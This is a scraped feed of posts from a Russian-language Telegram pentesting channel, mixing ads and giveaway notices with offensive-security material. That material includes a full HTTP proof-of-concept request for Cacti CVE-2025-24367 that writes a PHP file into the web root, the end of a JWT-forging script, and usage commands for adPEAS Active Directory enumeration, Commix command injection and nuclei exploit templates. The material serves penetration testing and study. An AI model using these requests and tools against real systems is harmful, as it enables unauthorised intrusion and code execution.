jwt_parts.append(base64.urlsafe_b64encode(signature))

return b'.'.join(jwt_parts)

print(f'Secret: {secret}')
print(jwt_gen(header, payload, secret))

#jwt #token #flask #python

✈️ Pentest HaT
02/19/2025, 08:19
t.me/pt_soft/495
PT
Pentest HaT
2 004 subscribers
4
9
591
⚙️ Cacti CVE-2025-24367
Arbitrary File Creation leading to RCE

Позволяет аутентифицированному пользователю злоупотребить функциями создания графов и шаблонов графов для записи произвольных PHP-скриптов в корень сайта

PoC:
POST http://192.168.178.78/cacti/graph_templates.php?header=false HTTP/1.1
host: 192.168.178.78
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:133.0) Gecko/20100101 Firefox/133.0
Accept: */*
Accept-Language: en-GB,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
content-length: 804
Origin: http://192.168.178.78
Connection: keep-alive
Referer: http://192.168.178.78/cacti/graph_templates.php?action=template_edit&id=297&csrf_timeout=true&csrf_timeout=true
Cookie: CactiDateTime=Fri Jan 03 2025 14:03:51 GMT+0000 (Greenwich Mean Time); CactiTimeZone=0; Cacti=r378gdiav394djct96o26mliud; cacti_remembers=1%2C0%2C1ac46cea6e1f0225f6e52320b4d734503fac5215a76879b3cb2c939d5cc56c49
Priority: u=0

__csrf_magic=sid%3A3363ef9d47d62372302b4941b790e92f5f749d9c%2C1735913031&name=PING+-+Advanced+Ping&graph_template_id=297&graph_template_graph_id=297&save_component_template=1&title=%7Chost_description%7C+-+Advanced+Ping&vertical_label=milliseconds&image_format_id=3&height=200&width=700&base_value=1000&slope_mode=on&auto_scale_opts=1&upper_limit=10&lower_limit=0&unit_value=&unit_exponent_value=1&unit_length=&right_axis=&right_axis_label=XXX%0Acreate+my.rrd+--step+300+DS%3Atemp%3AGAUGE%3A600%3A-273%3A5000+RRA%3AAVERAGE%3A0.5%3A1%3A1200%0Agraph+xxx2.php+-s+now+-a+CSV+DEF%3Aout%3Dmy.rrd%3Atemp%3AAVERAGE+LINE1%3Aout%3A%3C%3F%3Dphpinfo%28%29%3B%3F%3E%0A&right_axis_format=0&right_axis_formatter=0&left_axis_formatter=0&tab_width=30&legend_position=0&legend_direction=0&rrdtool_version=1.7.2&action=save

🖥 Summary

#web #rce #cacti

✈️ Pentest HaT
02/18/2025, 13:09
t.me/pt_soft/494
PT
Pentest HaT
2 004 subscribers
1
79
tmpl6lr6z7_.mp4
Вебинар про UserGate SIEM

⚡ Отечественные компании каждый день сталкиваются с различными рисками и угрозами, часть из которых помогает закрыть отказоустойчивость.

📊Спикеры:
- Дмитрий Чеботарев, менеджер по развитию UserGate SIEM;
- Дмитрий Богданов, ведущий инженер UserGate.

✅ Расскажут об отказоустойчивости и кластеризации и о том, для чего они нужны;
✅ Покажут кейсы использования.

Зарегистрироваться

#реклама 16+
webinar.usergate.com

О рекламодателе
02/18/2025, 12:44
t.me/pt_soft/493
PT
Pentest HaT
2 004 subscribers
Repost
5
5
392
Ломаем ваши видеокарты: распаковка эксплойта для CVE-2024-0132 под NVIDIA Container Toolkit
#nvidia #CVE@poxek #container

В сентябре 2024 года компания WIZ обнаружила критическую уязвимость в системе безопасности, обозначенную как CVE-2024-0132, которая затрагивала все версии NVIDIA Container Toolkit.

Уязвимость была устранена в NVIDIA Container Toolkit v1.16.2 и NVIDIA GPU Operator v24.6.2, однако технические детали раскрыты только 11 февраля 2024 года. В рамках нашей работы нам пришлось разобрать патч и проэксплуатировать эту уязвимость до выхода информации от авторов оригинальной уязвимости.

P.s. респект команде Luntry

➡️Подробности

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча
02/17/2025, 18:03
t.me/pt_soft/492
PT
Pentest HaT
2 004 subscribers
1
Дарим подписку на Яндекс Музыку

Ответьте на 1 вопрос и Яндекс Музыка для вас и 3-х ваших близких 30 дней бесплатно.
Кинопоиск и Яндекс Книги тоже в подписке.
Попробуйте сейчас❤️

Попробовать

#реклама 18+
music.yandex.ru

О рекламодателе
Реклама на Яндексе
02/17/2025, 13:40
t.me/pt_soft/491
PT
Pentest HaT
2 004 subscribers
25
599
Тамара свой выигрыш забрала! 👍
02/05/2025, 23:49
t.me/pt_soft/490
PT
Pentest HaT
2 004 subscribers
11
535
чуть автора на таске сломал)
02/05/2025, 23:33
t.me/pt_soft/489
PT
Pentest HaT
2 004 subscribers
10
533
Взломали меня ребят, пойду подумаю над своим поведением 😂
02/05/2025, 23:33
t.me/pt_soft/488
PT
Pentest HaT
2 004 subscribers
Repost
8
422
😈 [ RedTeam Pentesting @RedTeamPT ]

The LLMNR response name spoofing pioneered by @tiraniddo and @Synacktiv does not seem to work with mDNS & NetBIOS 😢
But guess what! It works with DNS😯

🥳 Here's the new pretender release supporting Kerberos relaying via DHCPv6-DNS-Takeover: 🎉

🔗 https://github.com/RedTeamPentesting/pretender/releases/tag/v1.3.1

🐥 [ tweet ]
02/05/2025, 21:01
t.me/pt_soft/487
PT
Pentest HaT
2 004 subscribers
1
Крупнейший университет искусственного интеллекта

Приглашаем на бесплатный однодневный интенсив по AI!

Освой искусственный интеллект для профессионального роста: создавай нейросети, автоматизируй бизнес-задачи и зарабатывай на AI-решениях.

✨ 8 000+ студентов со всего мира

✨ 600+ AI-проектов, созданных студентами

✨ Сборная Университета — победители крупнейших AI-хакатонов России

✨ Стажировки в крупнейших компаниях России (РЖД, Ростелеком, РУДН, Совкомбанк, Самолет и другие)

✨ Трудоустраиваем выпускников в крупнейшие компании (Яндекс, ВТБ, Сбербанк, Роскосмос и другие)

Будем рады видеть тебя в наших рядах!

Узнать больше

#реклама 16+
neural-university.ru

О рекламодателе
02/04/2025, 18:45
t.me/pt_soft/486
PT
Pentest HaT
2 004 subscribers
9
49
545
🔄 🏃 adPEAS 0.8.25

Отличный инструмент для проведения enumeration в 🏠 Active Directory

UPD. Добавили поддержку Windows 2025

Представлен в 2х вариантах, стандарт и лайт

Полная версия имеет встроенный модуль SharpHound для сбора информации в 😉 Bloodhound

Стандартный запуск:

Import-Module .\adPEAS.ps1
Invoke-adPEAS

Доступные модули:

Domain - поиск базовой информации о контроллерах домена, сайтов, трастов и стандартных парольных политиках

Rights - поиск различных прав, например LAPS, DCSync и т.д.

GPO - базовая информация о групповых политиках

ADCS - информация о центрах сертификации

Creds - ASREPRoast, Kerberoasting, GroupPolicies, Netlogon скрипты, LAPS, gMSA и т.д.

Delegation - поиск делегирования, например ограниченное делегирование, неограниченное делегирование и RBCD (Resource Based Constrained Delegation) для компьютеров и учетных записей

Accounts - информация об аккаунтах

Computer - AD DS, AD CS, Exchange серверы и т.д.

BloodHound - сборщик данных для BH

Варианты запуска:

Invoke-adPEAS -Domain 'contoso.com' -Outputfile 'C:\temp\adPEAS_outputfile' -NoColor

Invoke-adPEAS -Domain 'contoso.com' -Server 'dc1.contoso.com'

Определенная УЗ:

$SecPassword = ConvertTo-SecureString 'Passw0rd1!' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('contoso\johndoe', $SecPassword)

Invoke-adPEAS -Domain 'contoso.com' -Cred $Cred

Модули:

Invoke-adPEAS -Module Domain

Invoke-adPEAS -Module Rights

Invoke-adPEAS -Module GPO

Invoke-adPEAS -Module ADCS

Invoke-adPEAS -Module Creds

Invoke-adPEAS -Module Delegation

Invoke-adPEAS -Module Accounts

Invoke-adPEAS -Module Computer

Invoke-adPEAS -Module Bloodhound -Scope All

💻 Home

#soft #powershell #activedirectory #enumeration

✈️ Pentest HaT
02/03/2025, 09:20
t.me/pt_soft/485
PT
Pentest HaT
2 004 subscribers
444
02/03/2025, 07:45
t.me/pt_soft/483
PT
Pentest HaT
2 004 subscribers
444
Новые бесплатные курсы в канале Selectel Newsfeed.

Подойдут всем: от новичков до продвинутых айтишников.
Вас ждут обзоры, инструкции и статьи, которые помогут разобраться в темах структурно и последовательно.

Вступайте в сообщество IT-специалистов в Telegram от Selectel.

Подписаться

#реклама 16+
О рекламодателе
02/03/2025, 07:45
t.me/pt_soft/484
PT
Pentest HaT
2 004 subscribers
452
02/03/2025, 07:45
t.me/pt_soft/479
PT
Pentest HaT
2 004 subscribers
441
02/03/2025, 07:45
t.me/pt_soft/481
PT
Pentest HaT
2 004 subscribers
443
02/03/2025, 07:45
t.me/pt_soft/482
PT
Pentest HaT
2 004 subscribers
442
02/03/2025, 07:45
t.me/pt_soft/480
PT
Pentest HaT
2 004 subscribers
42
2
559
🎉 Результаты розыгрыша:

Победитель:
1. Тамара

Проверить результаты
02/02/2025, 17:31
t.me/pt_soft/478
PT
Pentest HaT
2 004 subscribers
1
Пути развития отечественной ИТ-отрасли

Пресс-конференция РУССОФТ «Взгляд в будущее. Какие изменения ждут ИТ-отрасль в ближайшие 25 лет?»

Подписаться

#реклама
О рекламодателе
02/02/2025, 06:12
t.me/pt_soft/477
PT
Pentest HaT
2 004 subscribers
2
19
449
🔄 💉 Commix v4.0-stable

UPD. Большой апдейт до major ветки 4.0

Комбайн для эксплуатации Command Injection уязвимостей, написан на python 💻 Команды, ключи, вывод и все остальное очень похоже на SQLMap.

В 🐧 Kali предустановлен.

💻 Установка:

git clone https://github.com/commixproject/commix.git commix
python commix.py -h

"Детский" режим:

python commix --wizard

Обычный запуск:

python commix -u http://62.173.140.174:16016/ --data 'action='

Поддержка тамперов:

python commix -u http://62.173.140.174:16016/ --data 'action=' --tamper=space2ifs

Список тамперов:

python commix --list-tampers

💻 Download
⚙️ Usage examples

#commix #python #pentest #soft

✈️ Pentest HaT
01/31/2025, 09:06
t.me/pt_soft/476
PT
Pentest HaT
2 004 subscribers
1
22
Миграция в облако без сбоев и лишних затрат!

Перенесите свою IT-инфраструктуру в облако с помощью экспертов Yandex Cloud. Наши инженеры подберут оптимальное решение для вашего бизнеса, минимизируют риски и помогут построить архитектуру под ваши задачи.

Успейте подать заявку до 28 февраля, и мы компенсируем все расходы на услуги инженеров и инфраструктуру для миграции и тестирования.

Мигрируйте в облако быстро и без лишних расходов! 📊

⚡Оставьте заявку уже сейчас!

Начать

#реклама
yandex.cloud

О рекламодателе
Реклама на Яндексе
01/30/2025, 14:12
t.me/pt_soft/475
PT
Pentest HaT
2 004 subscribers
7
20
501
🤩 Abusing multicast poisoning for pre-authenticated Kerberos relay over HTTP with Responder and krbrelayx

Relay через отравление LLMNR - research

😹 Krbrelayx
😹 Responder

#redteam #krbrelayx #llmnr #pentest #responder #relay

✈️ Pentest HaT
01/30/2025, 09:01
t.me/pt_soft/474
PT
Pentest HaT
2 004 subscribers
17
2
517
Для того чтобы принять участие нужно рассказать стишок нажать кнопку принять участие постом выше
Напомню, разыгрываю подписку на 1 год HTB VIP+, не стану вас долго мурыжить и поставил конец конкурса на воскресенье
01/29/2025, 12:03
t.me/pt_soft/473
PT
Pentest HaT
2 004 subscribers
38
19
674
Друзья, как и обещал начинаем розыгрыш
01/29/2025, 10:45
t.me/pt_soft/472
PT
Pentest HaT
2 004 subscribers
1
Полезно как новичкам, так и опытным аналитикам.

⚡Добро пожаловать в мир системного анализа вместе с Ольгой Пономаревой, опытным системным аналитиком и наставником, который знает, как вдохновлять и дает полезные знания.

На канале Ольги вы найдете все, что нужно для освоения профессии: курсы, интерактивные игры, подробные разборы проектов и полезные советы. Если вы хотите стать системным аналитиком или прокачать текущие навыки, этот канал станет вашим основным источником знаний. Здесь вас ждут рекомендации, как пройти собеседование на должность аналитика, показать удачные проекты, рабочие шаблоны и подсказки, как составить грамотный план анализа и руководства.

Подписывайтесь и получайте знания от одного из ведущих специалистов в этой области.

Подписаться

#реклама 16+
О рекламодателе
01/28/2025, 18:42
t.me/pt_soft/471
PT
Pentest HaT
2 004 subscribers
37
4
582
🙃 Розыгрышу быть!

Доброго вечера друзья!

Приятно, что предыдущий пост получил большой отклик и собрал много лайков
Значит тема актуальная и многие заинтересованы в том, чтобы принять участие
Сейчас поищу подходящего tg бота для данной задачи
Если кто-то знает подобных и проверенных, напишите в комментарии
Как все будет готово запущу конкурс
Напомню, разыграю годовую подписку HTB VIP+

✈️ Pentest HaT
01/28/2025, 18:28
t.me/pt_soft/470
PT
Pentest HaT
2 004 subscribers
2
492
tmp22klrq55.mp4
Онлайн-интенсив для ИТ-специалистов в Открытых школах Т1

Уже есть опыт работы в ИТ, но хочешь прокачать скилы и продвинуться в карьере?

Тогда скорее залетай на бесплатный ИТ-интенсив в Открытых школах Т1.

Открытые школы — это возможность усилить свои навыки и получить оффер в ИТ-холдинг Т1. И все это за месяц, онлайн и в удобное вечернее время.

Что ты получишь?

✅ бесплатное обучение в гибком формате: по вечерам, онлайн, из любого города РФ и РБ.
✅ материалы от HR для прокачки резюме и подготовки к интервью в Т1.
✅ много практики и уникальный рыночный опыт.
✅ поддержку опытных преподавателей и карьерный фаст-трек до мидла в Т1 для лучших выпускников.
✅ реальный шанс получить оффер в Т1.

Более 1000 специалистов уже прошли этот путь — теперь твоя очередь!

Регистрация до 10 февраля!

Подать заявку

#реклама 16+
t1.ru

О рекламодателе
01/28/2025, 16:43
t.me/pt_soft/469
PT
Pentest HaT
2 004 subscribers
109
1
565
🙃 Розыгрыш HackTheBox VIP+ ?

Друзья, товарищи, всех приветствую!

Январь заканчивается, не взирая на дожди и зеленую траву за окном, а новогодний розыгрыш я так и не провел :)
В прошлом году заняли 4ое место на Cyber Apocalypse 2024: Hacker Royale, мой профиль
Получили в том числе промо код VIP+ подписки на 1 год, цена вопроса чуть за 200, по различным причинам сам на HTB уже не сижу и в ближайшее время не планирую
Зато думаю разыграть данную подписочку, как считаете, нужна она кому то ?
Если да, ставим 👍

P.S. Если кто-то из авторов каналов хочет провести какой-то совместный розыгрыш или другую коллаборацию, пишите в лс, мне было бы интересно что-то такое сделать

✈️ Pentest HaT
01/28/2025, 08:48
t.me/pt_soft/467
PT
Pentest HaT
2 004 subscribers
1
539
Бесплатный проект для новичков в DevOps. Подписывайся!

Сообщество для начинающих DevOps-инженеров.

В канале собраны фишки DevOps. Как быстро стартануть в DevOps и внедрить методологию в свои проекты? Какие инструменты осваивать в первую очередь? Лекции, статьи и вебинары от ведущих практиков IT-рынка. Практические задания, еженедельные разборы и лайвы от наставника проекта

Подписаться

#реклама 16+
slurm.io

О рекламодателе
01/28/2025, 08:46
t.me/pt_soft/466
PT
Pentest HaT
2 004 subscribers
Repost
6
460
Это оказалось дольше, чем я думал) Наконец зафиксировал версию 0.1... Кто хочет, развлекайтесь)

https://adaptix-framework.gitbook.io/adaptix-framework

P.S. по версии 0.2 тудушку в ближайшие дни закину) не стесняйтесь сообщать о багах и предлагать свои идеи) можно и в лс)
01/27/2025, 19:46
t.me/pt_soft/465
PT
Pentest HaT
2 004 subscribers
9
67
653
📖 nuclei poc

Приветствую друзья!

В очередных поисках всякого интересного на просторах нашего необъятного интернета нашел отличный репозиторий от наших китайских товарищей с огромным количеством шаблонов для nuclei
Обновляется на ежедневной основе с помощью Github Actions и содержит более 110k! шаблонов. В файле repo.csv указаны источники для обновлений

Все шаблоны разбиты по категориям и вендорам

Установка:

git clone https://github.com/adysec/nuclei_poc
cd nuclei_poc

Примеры:

nuclei -t poc/ -u http://example.com

nuclei -t poc/web/ -u http://example.com

nuclei -t poc/wordpress/ -u http://example.com

😹 Home
😹 Eng. version

#nuclei #pentest #web #poc

✈️ Pentest HaT
01/27/2025, 09:01
t.me/pt_soft/461
Search results are limited to 100 messages.
Some features are available to premium users only.
You need to buy subscription to use them.
Filter
Message type
Similar message chronology:
Newest first
Similar messages not found
Messages
Find similar avatars
Channels 0
High
Title
Subscribers
No results match your search criteria